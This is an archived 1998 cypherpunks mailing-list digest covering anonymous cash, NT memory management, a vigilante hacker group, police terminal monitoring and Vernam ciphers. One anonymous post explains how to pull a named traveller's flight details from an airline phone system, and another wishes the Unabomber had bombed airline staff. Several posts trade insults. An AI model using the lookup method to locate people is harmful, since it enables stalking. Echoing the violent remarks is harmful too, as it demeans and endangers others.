From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 3 Feb 1998 11:35:51 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The Continued Attack on Cash (Was: "The Right ofAnonymity"...)
In-Reply-To: <v03102801b0fbbc4d4735@[207.167.93.63]>
Message-ID: <v03102809b0fc3e0fc392@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:42 PM -0800 2/2/98, Anonymous wrote:
>Tim May wrote:
>> The real solution is easy.
>
>
>Easier said than done.
>
>Designing digital cash software is easy.  (Several prototypes exist.)
>Getting people to accept it as having value is not.

The thrust of my arguments, in my several posts in this thread, has been
simply removing the laws which require True Names to be attached to
transactions, bank account, credit cards, etc.

No digital cash is needed.

The rest of Mr. Anonymous' argument is a straw man, based on the difficulty
of implementing digital cash.

When I say the real solution is easy, I mean it. Get rid of the laws
telling people how often and in what amounts they may take money out of
their bank account, get rid of laws telling banks they must narc out
customers who remove "too much" money, and get rid of any laws restricting
the use of names customers and their financial partners may use.

(BTW,  until these actions happen, no widespread use of digital cash is
likely to be accepted as legal. This has a lot to do, I think, with why
d.c. projects are moving so slowly.)

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 3 Feb 1998 09:49:58 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: VMM question - reply (fwd)
Message-ID: <199802030146.TAA30693@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 02 Feb 1998 01:39:47 -0600
> From: Lenny Blumberg <lenny@bga.com>
> Subject: VMM question - reply

> Hmmmm.....
>       I would imagine that the OS would keep a disk map in memory and
> mark it with a flag to indicate if it's been paged into memory.

This is a function of the "Look Aside Buffer" and the actual operation is a
bit more complicated. The vmm must keep up with which processes have it
mapped, where in their indipendant memory maps it shows up at, what the
status is in each of those maps, whether it's sharable or not (though the
Linux vmm doesn't seem to do any write locking), and probably some functions
that I've missed.

> At
> that point, instead of updating the disk drive - It looks up the page in
> memory and updates that copy.

There are two ways to do this in general...

Write-through: means the vmm goes ahead and not only updates the vmm copy
               but the copy on the drive. Note that this may or may not
               actualy update other copies if a process has one that isn't
               sharable (ie has its own private copy). This has a lot of
               over-head in that there is lots of i/o.

Write-back: means that the data in the individual pages doesn't get written
            to the drive until the page is either swapped out of active
            memory (and written to swap) or is closed. This is a form of
            'lazy propogation'. Again, this doesn't address how other
            processes may have their images effected.

>   The only problem is that at that point,
> you're now running into a mess of lock problems that carry their own
> overhead.

One easy way, at least on a Unix machine, is to keep the system clock setting
when the page is created. Then close them in chronological sequence. This
obviously has it's problems. The first person to open isn't guaranteed to be
the first person done. Another method would be to select via a PRNG the
'first' process to update the page. Then each following would take their
turn according to the spin of the wheel. This leaves us with two options,
as each process closes it only writes the changes that it has made; which
could overwrite the previous user if they edited the same part of the file.
The alternative would be to force each user to create a different file with
some filename convention to differentiate them. Then leave it up to some
unknown method to arbitrate the file propogations at that point by some
'compare and share' method perhaps.

>      Another alternative would be to track the disk map and force a
> write for a page that is pending a read.

How do you know ahead of a read that a process is going to read that page?
Or are you saying that before another process can open a file we force the
first process to go ahead and write its changes? What happens once two or
more have the page mapped and begin editing? How do you propose to manage
the file closure writes that will occur?


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Tue, 3 Feb 1998 10:23:18 +0800
To: hh-chat@gateway-e.secureservers.net
Subject: Hacker group battles child porn [c|net News, 2/2/98]
Message-ID: <Pine.SOL.3.96.980202204002.5701A-100000@c00957-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hacker group battles child porn

C|NET News.Com
News Story:
http://www.news.com/News/Item/0,4,18717,00.html?st.cn.fd.tkr.news
CNET Radio Interview:
http://www.news.com/Radio/Index/0,55,,00.html?st.cn.fd.tb.ne

        
By Courtney Macavinta

February 2, 1998, 1:10 p.m. PT


A secret society that hunts the Net to reveal the identities of alleged
pedophiles and child pornographers has a message for those who think
there's too much media hype about the problem: Believe what you hear.

Members of a group called Ethical Hackers Against Pedophilia (EHAP -
http://www.hackers.com/ehap/index2.htm) are using their high-tech cracking
talents to find out the identity and physical location of people they say
post child pornography within newsgroups, chat rooms, and Websites. The
17-member nonprofit group also says it tries to determine the sources of
video streaming sites that feature children being sexually assaulted in
real time.

"The pedophiles that are distributing child pornography online are
skirting the law by remaining anonymous. We decided to use the skills that
we possess as hackers, engineers, and teachers to educate the public that
hackers aren't all bad guys, and to help law enforcement in apprehending
the child pornographers," said EHAP's secretary, "Oracle," who asked that
his real name not be published.

"As long as the people are arrested and the kids aren't hurt anymore,
every one of us is willing to accept responsibility for our actions as
long as one kid is helped," he added.

EHAP may go so far as to dig up the Social Security numbers of people it
suspects are producing and distributing child porn on the Net. Under the
guise of a confidential informant, EHAP then passes on these details to
various law enforcement agencies, such as the FBI.

It's virtually impossible to know if EHAP's tips have led to any
investigations or arrests, though the group says its information has been
put to work. Still, its vigilante tactics raise privacy  concerns, as well
as serious questions about law enforcement's possible use of information
that could have been obtained illegally.

According to the FBI, the Net increasingly is being used to lure children
to physical meetings, which could lead to abduction or abuse, and there
has been a boom in child pornography being trafficked online. These acts
violate federal law.

During two congressional hearings last year, FBI officials told lawmakers
they are working to stop the rise in these illegal acts through the 
bureau's Crimes Against Children initiative. 

"The FBI has investigated more than 70 cases involving pedophiles
traveling to meet undercover agents or officers posing
as juveniles for the purpose of engaging in an illicit sexual
relationship," Stephen Wiley, chief of the FBI's violent crime and major
offenders section, testified in November before the House Judiciary
Subcommittee on Crime.

The FBI has launched other special programs, such as Innocent Images, in
which agents go online and portray themselves as children and crack down
on those who solicit encounters with them. The program, which is run by
the Baltimore, Maryland, FBI field office, also serves as a clearinghouse
for tips and information regarding suspected online crimes against
children. The program was started in 1994 after local agents uncovered an
online child porn ring while searching for an abducted boy.

The 13-year-old boy, George Burdynski of Prince Georges County, Maryland,
has never been found. But the program has lead to more than 90 arrests as
well as the development of online crime fighting techniques. For instance,
in October, three Californians were collectively sentenced to 60 years in
prison for running the so-called Orchid Club, an international service
that used the Net to distribute child pornography to its members. 

Despite growing efforts by the FBI and organizations such as the National
Center for Missing and Exploited Children, EHAP says its private campaign
is vital, as these agencies don't have the full-time resources to combat
online child pornography. EHAP also readily admits that it would be
unconstitutional for law enforcement to use some of its methods.

"We're extremely careful about who we hack. There are so many people
trading child porn out there, but we go after the people who are producing
the material. That's who we hunt," Oracle said. "Law enforcement are
restricted in ways we're not--but I'm not saying that we break the
law."

EHAP is not the first group to use its own devices in an effort to assist
law enforcement in tracking down people who they suspect use the Net to
perpetrate crimes.

For example, a worldwide network of Internet users known as the  
CyberAngels provide online safety tips and work with law enforcement to
stop the trading of online pornography. Other Net users have been known to
shut down chat rooms or flame those who they deem pedophiles or sexual
predators. CyberAngels doesn't support the electronic harassment of
others. EHAP keeps its methods confidential.

"Although we would appreciate any information these individuals may have,
to violate the law to get the information is not acceptable," said George
Grotz, a spokesman for the FBI's San Francisco office. "But how many
pedophiles would come to us and say their site had been broken into?"

Still, the FBI and other child protection agencies say they need all the
help they can get.

"Here in the San Francisco office, we have neither the time or resources
to surf the Net looking for child pornography," Grotz added. "That said,
we do respond aggressively when information is brought to our attention
from outside sources, or if we develop information during the process of
another investigation."

The National Center for Missing and Exploited Children, which is supported
by the Justice Department, also expanded its efforts to encompass online
activity. As announced in December at the White House-endorsed Children's
Internet Summit in Washington, the center will launch a Web site on March
1 to collect tips regarding online child porn and suspected crimes against
children.

"It's a huge problem that is as new as the Internet. For law enforcement,
it's not easy to handle," Todd Mitchell, program advocate for the
exploited child unit, said today.

"Parents can't leave their child in front of a computer for hours and
hours where they can stumble upon pornography or be solicited in a chat
room. They have to teach their kids some safety guidelines," he said. 

Regarding private citizens' groups such as EHAP and CyberAngels, he said
there are legitimate concerns, but that community activism is needed.

"If they work in conjunction with law enforcement, it can be something
that is a nice partnership between law enforcement and the community. If
they take the law into their own hands, it could do more harm that good,"
Mitchell said.

[EOF]
--
For more information about EHAP, go to
http://www.hackers.com/ehap/index2.htm
or send email to ehap@hackers.com

Regards,

TATTOOMAN 

Vice President of Ethical Hackers Against Pedophilia 
http://www.hackers.com/ehap/ 
ehap@hackers.com             

http://152.7.11.38/~tattooman/                      






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James O'Toole" <otoole@lcs.mit.edu>
Date: Tue, 3 Feb 1998 10:17:38 +0800
To: "'unicorn@schloss.li>
Subject: RE: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
Message-ID: <01BD301E.4FCC8EC0@slip-james.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain




Tim,

Maintaining anonymity in the face of the regulatory framework is certain to be difficult, and anything difficult is usually rare, expensive, or both.

An interesting question about the Privacy Card product is whether the social pressure against it is strong enough to defeat its privacy whenever the product is well advertised.  In other words, will a privacy product survive in spite of its own publicity in our current environment, or can privacy products only exist when their own existence is relatively unknown.  This is interesting because in the latter case, we have only a very very weak form of privacy/anonymity because it is hard to be sure how much privacy backs a product whose very existence is semi-secret.

Maybe we should consider putting up, and encouraging existing privacy-enhanced institutions to put up, challenge prizes based on privacy/anonymity preservation.  Just as we've seen prizes set for the cracking of specific composites and encrypted messages, we could ask Credit Suisse to put $1M in an escrow account at their main branch (Zurich?).  This escrow account would be a numbered account held by a trustee selected by the bank.  Let's say they wire $1000 per week to RSA Data Security in California, or to EFF.ORG, or to me, for that matter, and I wire it back.  I publish the full text of any documentation I can get from my bank account (an empty account I would maintain for this anonymity challenge).  Credit Suisse would promise to release the contents of the account to the first person to arrive at their main branch and present the name of the trustee.

That's not a very creative challenge...this could use more thought.

The point is that as far as I know, we haven't yet seen any really solid rewards placed to validate, advertise, or demonstrate the weakness of, well-known privacy-enhanced financial systems.  I don't even know that Digicash, which would be another logical sponsor, has put up such a challenge.  Have they?

  --Jim


----------
From: 	Tim May[SMTP:tcmay@got.net]
Sent: 	Monday, February 02, 1998 1:18 PM
To: 	Black Unicorn
Cc: 	rotenberg@epic.org; nym@vorlon.mit.edu; dcsb@ai.mit.edu; cypherpunks@Algebra.COM
Subject: 	Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...)

At 10:51 PM -0800 2/1/98, Black Unicorn wrote:
>Mr. May said:
>
>>Suffice it to say that I find nearly all cases where someone is "demanding"
>>personal information to be cases where the government has required them to,
>>for various unseemly purposes, or in cases where credit is being arranged.
>
>Of late I tried to pay off a rather large American Express bill.
>
>Suddenly, AMEX won't take cash in excess of $1,000 in any single billing
>period (30 days).  The large sign on the wall indicated the substance of
....


It's worth noting (again) that a very simple technological/social solution
to the "credit card companies have records on people" problem, the one
often cited by "privacy law advocates" as the reason for a Data Privacy
Act, is easily found.

Namely, remove any impediments to the issuance of credit or debit cards
unlinkable to the True Name of a user.  A card issuer could feature this as
a Privacy Card, either backed by transfers of backing capital to accounts,
or using Chaum-style methods.

This is fully feasible using Chaumian credential-revealing mechanisms. (Cf.
Chaum's seminal "Transaction Systems to Make Big Brother Obsolete," in
Communications of the ACM, November 1985. Updated a few times and available
in reprints or other places. Try search engines for latest locations.)

However, the trends are in just the opposite direction, as both Black
Unicorn and Bill Stewart have noted in this thread. Between the War on
Drugs, the laws about money laundering, the fears of tax evasion, and the
general burrowcrat desire to record the movements and actions of
citizen-units, such a Privacy Card would be frowned-upon.

Various roadblocks, ranging from "know your customer" restrictions on banks
to anti-money-laundering laws, would be thrown up to stop any such Privacy
Card.

The real solution is easy.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."




For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fnorky@geocities.com (Douglas L. Peterson)
Date: Tue, 3 Feb 1998 05:52:32 +0800
To: Ray Arachelian <sunder@sundernet.com>
Subject: Re: Spyking snips: Police MDT's + cia/russian spying
In-Reply-To: <Pine.SUN.3.96.980128130055.27062A-100000@beast.brainlink.com>
Message-ID: <34d73c32.9887174@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 28 Jan 1998 13:03:42 -0500 (EST), you wrote:
>
>2)From: "Brandon Robinson" <brobinson@navicom.com>
>Subject: Re: Monitoring MDT's 
>
>>14)From: "self destruct" <<slfdstrct@email.msn.com>
>>Subject: Monitoring MDT's
>>hi all,....i am wondering if there is a way to monitor police MDT's
>>(mobile display terminals)
>>i have the frq. that they use but i dont know how to hook up a scanner to
>>p/c. any thoughts would be appreciated thank you
>
>Since no one else seemed to respond to this, I guess I will...first off
>M.D.T. stands for (Mobile Data Terminals), I got this posting off some
>group I can't really remeber where from, but it is informative, and was
>the
>subject of a Feb, '97 "911Dispatcher Magazine" story. It should answer all
>of your questions, I also have a list of some places where you can buy the
>unit pre-made, or a kit to make your own. I have left the Source code out
>on purpose as it is rather lengthy, if you want it I can send it to you. 
>
>-BBR

[BIG SNIP of story]

After reading all the stuff on MDT's, a got an idea.

How about a central monitoring web site (out of the US).  This system
would run a small server program that could accept input, via the net,
from MDT monitors around the country.  Each MDT monitor would collect
data and send it in once every 5 minutes.

A person could goto a web site and see what is going on around the
country.  Hmmm.  Watching the watchers??

-Doug

-------------------
Douglas L. Peterson
mailto:fnorky@geocities.com
http://www.geocities.com/SiliconValley/Heights/1271/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 3 Feb 1998 11:29:01 +0800
To: cypherpunks@toad.com
Subject: Re: Bush Gang Suspected In Assault On Presidency
In-Reply-To: <19980203014502.13306.qmail@nsm.htp.org>
Message-ID: <iq2ake24w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous <remailer@htp.org> writes:

> dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes:
>
> > Also laRouche has a math ph.d. as does Ted Kachynzki.  Do you know any
> > other kookie math PhDs around here?
>
> I heard a certain Dr. Vulis <spit> got his degree in mathematics.

You heard right.  And you know what oranization is by far the biggest
employer of math phds...

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 3 Feb 1998 11:57:49 +0800
To: cypherpunks@toad.com
Subject: Re: Bush Gang Suspected In Assault On Presidency
Message-ID: <199802030341.WAA06374@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From cypherpunks-errors@toad.com Mon Feb  2 22:33:28 1998
   >   
   >   Anonymous <remailer@htp.org> writes:
   >   
   >   > dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes:
   >   >
   >   > > Also laRouche has a math ph.d. as does Ted Kachynzki.  Do you know any
   >   > > other kookie math PhDs around here?
   >   >
   >   > I heard a certain Dr. Vulis <spit> got his degree in mathematics.
   >   
   >   You heard right.  And you know what oranization is by far the biggest
   >   employer of math phds...

The Neurotic Society of Assholes.
---guy

   [Vulis replied to himself (what a loser!), I couldn't help myself]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Tue, 3 Feb 1998 15:25:42 +0800
To: Jon Cooper <Jon.Cooper@Eng.Sun.COM>
Subject: Re: distributed cryptographic attack demo
In-Reply-To: <libSDtMail.199802021328.23604.cooperj@shoki>
Message-ID: <3.0.5.32.19980202230929.007e1a30@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 01:28 PM 2/2/98 -0800, Jon Cooper wrote:
>hi,
>
>i'm trying to do a demo of a distributed object technology and it seems
>to me that many cryptographic attacks would be facilitated by our 
>approach.  
>


Oh, you mean like Counterpane's screen saver or the various
international key cracking escapades.  Well, duh.

Want to impress the masses?  Order "The joy of sex" using
Clinton's mastercard and forward complete documentation
to the Wash Post.





David Honig 			honig@alum.mit.edu
---------------------------------------------------
If we can prevent the government from wasting the labours of the people
under the pretense of
 caring for them, they will be happy.  -TJ





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@temp0207.myriad.ml.org (Matthew Ghio)
Date: Tue, 3 Feb 1998 12:42:32 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Jim Bell Update
Message-ID: <199802030430.XAA29097@myriad>
MIME-Version: 1.0
Content-Type: text/plain



Jim Bell wrote:

> "I think that one last (temporary) hope for government is to delay AP.
> Chances are good that the "think tank" decided thatt the best way to delay
> AP is to discredit me, its author. It was a desperate gamble, particularly
> because the act of harrassing me automatically gives AP more publicity.
> That's the reason they will fail; the more they try to "get" me, the worse
> it will be for them."

The government already has plans for dealing with AP (what do you think all
those secret service guys in DC are supposed to be doing?)

Whether AP is inevitable or not, if people don't know where you are, they
can't come kill you.  This is why privacy is so important in the digital
era.

Of course, there are still nukes, but as has been pointed out already many
times, the use of a nuclear weapon is likely to kill more friends than
enemies.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 3 Feb 1998 13:37:29 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Memory Management (fwd)
Message-ID: <199802030535.XAA32230@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 02 Feb 1998 23:01:16 -0600
> From: Stu Green <stugreen@bga.com>
> Subject: Re: Memory Management

> >  >       I would imagine that the OS would keep a disk map in memory and
> >  > mark it with a flag to indicate if it's been paged into memory.
> > 
> >  This is a function of the "Look Aside Buffer" and the actual operation is a
> >  bit more complicated.

> Jim - I'm familiar with the 'translation look aside'buffers
> on
> RISC chips, especially on the MIPS where it provides a
> method
> of managing cache flushes and reloads on writes and does act
> like a page fault to intiate the writes.  I haved seen TLBs
> associated with disk operations, but that don't mean shit to
> a
> tree.

It turns out, I've been doing more reading on vmm on NT, that the model
that's implimented in NT is a hybrid of the MIPS 4000 model and the 386
model. That rationale is that this allows the actual code in the HAL to be
much smaller by taking advantage of the different hardware aspects of the
cpu architetures (this means speed).

Don't know if I am going to get this right since I still haven't figured out
all the intricacies. But this is what I *think* is going on (in NT)...

The TLB (Translation Lookaside Buffer) is used in NT to determine if the
page frame is currently in memory or swapped out. It does this by marking a
frame 'invalid' if it's swapped out and listing it's actual page frame
number if it's a valid page. Invalid does *not* mean that it can't still be
in memory. The reason is that each process has a 'Page Frame Directory' which
lists all the valid Page Table Pages for that process. Each of these Page
Table Pages lists where each Page Frame Page is within that processes memory
map (and that's a whole nother issue with various parts being pageable and
non-pageable as well as system or user level). Each Page Frame Page knowns
where the individual pages are (ie in memory or swapped out). There is a
rather tedious mechanism that translates the virtual addresses to PFD's,
PTP's, and finaly to PFP's. That's what I'm trying to get a handle on now.
Now these various page related structures get quite big and themselves need
to be swapped out. So there is a level of recursion in here. There is also a
Page Table Page structure called a 'Prototype PTE Address' (a PTE is a Page
Table Entry - ie a valid page frame, these things seem to have several
different names making it confusing to follow at times) which is used to
allow processes to share a PTE across PFD's. Once we get to a PTE we actualy
have a 4k chunk of code or data that a cpu can operate on/with.

So, there is where I'm at right now...

Hope that makes it clear as mud.

Naslajdyatciya!

ps. I am enjoying my Toshiba 445CDX, it's a pretty cool machine. Anyone
    got any suggestions on a PCMCIA ethernet card?

pss. Next Saturday is the 1st Saturday in Feb. so the Dallas 1st.
     Saturday Sale will be going on. Anyone interested? It's basicaly
     about 20 sq. blocks of computer equipment of every make, model,
     and age imaginable as well as lots of other stuff (time before
     last some guy had Cobra Helicopter IR cameras for $500 ea., would
     make a great IR telescope.). We usualy leave Saturday morning around
     2am and get there a bit before 7am. The sale usualy starts about
     midnite Friday nite and goes until Saturday evening. The best deals
     are early Saturday morning (my experience over about 5 years of
     going anyway).


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Tue, 3 Feb 1998 13:54:41 +0800
To: declan@well.com
Subject: Re: Airline ticket information -- help
Message-ID: <a632a8c39deae5d6c11383572b81ca05@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



> Just as an example, call USAir at 1-800-428-4322, press 1 for automated
> service. It will give you options to check scheduled flights and
> departure times. After you find the flight number, select the option to
> confirm your reservation or select a seat. It will ask for your frequent
> flyer account number, but if you don't enter one, the helpful computer
> will let you enter the passenger's last name instead.


I figured you could probably BS such info out of a helpful customer service
agent, but this is just too fucking easy.

Now I know why Kaczynski wanted to bomb all those airlines and computer
companies.  I wish he'd gotten these idiots.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <remailer@htp.org>
Date: Tue, 3 Feb 1998 10:01:03 +0800
To: cypherpunks@toad.com
Subject: Re: Bush Gang Suspected In Assault On Presidency
In-Reply-To: <a5Bake1w165w@bwalk.dm.com>
Message-ID: <19980203014502.13306.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain



dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes:

> Also laRouche has a math ph.d. as does Ted Kachynzki.  Do you know any
> other kookie math PhDs around here?

I heard a certain Dr. Vulis <spit> got his degree in mathematics.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 3 Feb 1998 09:42:41 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
In-Reply-To: <199802020709.BAA27402@einstein.ssz.com>
Message-ID: <199802030132.CAA01785@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Attila T. Hun wrote:

>     until we really do have a virtual country and virtual
>     cash, they will always be able to trace it.  As I
>     understand it, the banks keep a record on anything over
>     $1k cash which means there is a master list which can
>     be sorted and filtered. over $10K you must fill out the
>     IRS form; for international you are required to file
>     Dept of the Treasury form 515.

Ironically, the reglations may be their own undoing here.  It seems most
banks have decided to recoup the expense of all that paperwork by charging
per-transaction ATM fees.  And customers hate transaction fees, so they
tend to take out as much money as possible each time they use the ATM.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 3 Feb 1998 10:54:41 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
In-Reply-To: <v03102801b0fbbc4d4735@[207.167.93.63]>
Message-ID: <199802030242.DAA10101@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
> The real solution is easy.


Easier said than done.

Designing digital cash software is easy.  (Several prototypes exist.)
Getting people to accept it as having value is not.

But let's suppose that we build a complete fault-tolerant digital cash
system with multiply-redunant servers all over the world, and you can sit
at your computer and trade crypto-credits with whoever you want.

You've got a small fortune worth of e$.  What are you going to buy with it?

Seriously.

Are you going to buy groceries at the local supermarket with cypherbucks?
I doubt it.  Surely you can't use the system to pay for your house or car,
or other government-traceable assets.  And certainly not airline tickets.

Perhaps you could buy a new computer.  That would work, if you could
arrange delivery anonymously (which I doubt).  Or maybe you could pick it
up in person, but you don't need e-cash for that.

About the only practical thing you could buy would be a pre-paid phone
card.  Anything else, you'd need to arrange delivery for, and if you can
have contraband mailed to you, then you can have other things that you
don't want sent to you.

The problem is not digital cash.  The problem is delivering the goods
bought with it.  Solve the delivery problem and digital cash will follow.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 3 Feb 1998 12:17:27 +0800
To: cypherpunks@toad.com
Subject: Bork
Message-ID: <199802030402.FAA19488@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




Once-a, zeere-a ves thees keed vhu, tuuk, a 
treep tu seengepure-a, und bruooght elung hees 
sprey peeent.... Und vhee.... he-a feenelly 
ceme-a beck. He-a, hed... cune-a merks ell oofer 
hees buttum.... he-a seeed thet is ves frum 
vhere-a zee verdee vhecked it su... herd.....

Bork Bork Bork!        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 3 Feb 1998 12:12:43 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Airline ticket information -- help
In-Reply-To: <v03007803b0fbb8956451@[168.161.105.216]>
Message-ID: <199802030405.FAA19763@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> Monica Lewinski and William Ginsburg are travelling on American Airlines
> Flight 420 on Wednesday, 4 February, departing Dulles Airport at 10:45
> a.m., EST, and arriving LAX at 3:35 p.m., PST.
>
> Good luck reporting on them, Declan!


I assume Tim is joking here, but this info really isn't too hard to find.

Just as an example, call USAir at 1-800-428-4322, press 1 for automated
service.  It will give you options to check scheduled flights and
departure times.  After you find the flight number, select the option to
confirm your reservation or select a seat.  It will ask for your frequent
flyer account number, but if you don't enter one, the helpful computer
will let you enter the passenger's last name instead.

Several other airlines have similar services..  Happy hunting!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 3 Feb 1998 22:47:32 +0800
To: kalliste@aci.net>
Subject: Gilbert Vernam
Message-ID: <34D7287E.1752@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Tuesday 2/3/98 7:02 AM

John Young
J Orlin Grabbe

The crypto problem was solved in 1918.  Vernam and Maugborne [sp?]
did the work.

Gilbert Vernam in 1918. Vernam used two tapes of random characters to
generate the additional characters. With the same tapes at each end set
to the same start position this system was unbreakable. The Germans
decided that the distribution of these key tapes presented too great an
operational problem and the Lorenz machine uses a complicated
mechanical gearing and cam system to generate a pseudo random sequence
with very long period and 10^19 complexity. They thought this
was good enough to ensure unbreakability, it wasn't!

Fushimi's implementation of Lewis and my GFSR algorithm has 
period of 2^521 - 1.  And LOTS of possible starting seeds.

John Young kindly posted my article on putting non-singular binary
matrices in one-to-one correspondence with the natural numbers.

Although the period of a shift register can be 2^521 - 1, 521 bits
determines THE EXACT SEQUENCE of the remaining 2^521 - 522 bits.

Pseudorandom numbers generators have an easier job than bits
used for cryptography.  

Pseudorandom number generators merely have to deceive statistical 
tests.

Orlin   Recall the GIANT radio transmitter in the south of Russia,
perhaps Baku.  

I heard on PBS TV that it was transmitting a shift register sequence. 
The 
Russians were apparently trying to communicate with underwater
submarines.

NSA crypto algorithms mostly rely on shift register sequences - both
linear and NON-LINEAR.  The R register in my SAND report posted at
jya.com implements a non-linear SECRET/NSI feedback algorithm.

Perhaps someone may have to put NSA's SECRET/NSI R register non-linear 
feedback function out on the web some time.  

So that every one can have a good laugh, of course.  Like for the
SECRET/NSI
number 31 algorithm step.

John Young   Judge Svet made a ruling.  I sent a copy
to you by snail mail.

Later,
bill

Title: Colossus Rebuild






The Colossus Rebuild Project
by Anthony E Sale, FBCS

A bit of History

Colossus was designed and built at the Post Office Research
Laboratories at Dollis Hill in North London  in 1943 by a team led by Dr
Tommy Flowers to help Bletchley Park in decoding the intercepted German
telegraphic cipher traffic enciphered using the Lorenz SZ42 cipher
machine.


Lorenz SZ42 cipher machine at Bletchley Park



This cipher machine enciphered electrical teleprinter signals which
used the international 5 bit Baudot teleprinter code. It enciphered the
input plain text by adding to it successively two characters before
transmission. Because this addition was bit by bit modulo 2, at the
receiving end with the Lorenz machine set to the same start position,
the same two characters were added again to the received characters
revealing the original plain text.
This scheme had been developed in
America by Gilbert Vernam in 1918. Vernam used two tapes of random
characters to generate the additional characters. With the same tapes at
each end set to the same start position this system was unbreakable. The
Germans decided that the distribution of these key tapes presented too
great an operational problem and the Lorenz machine uses a complicated
mechanical gearing and cam system to generate a pseudo random sequence
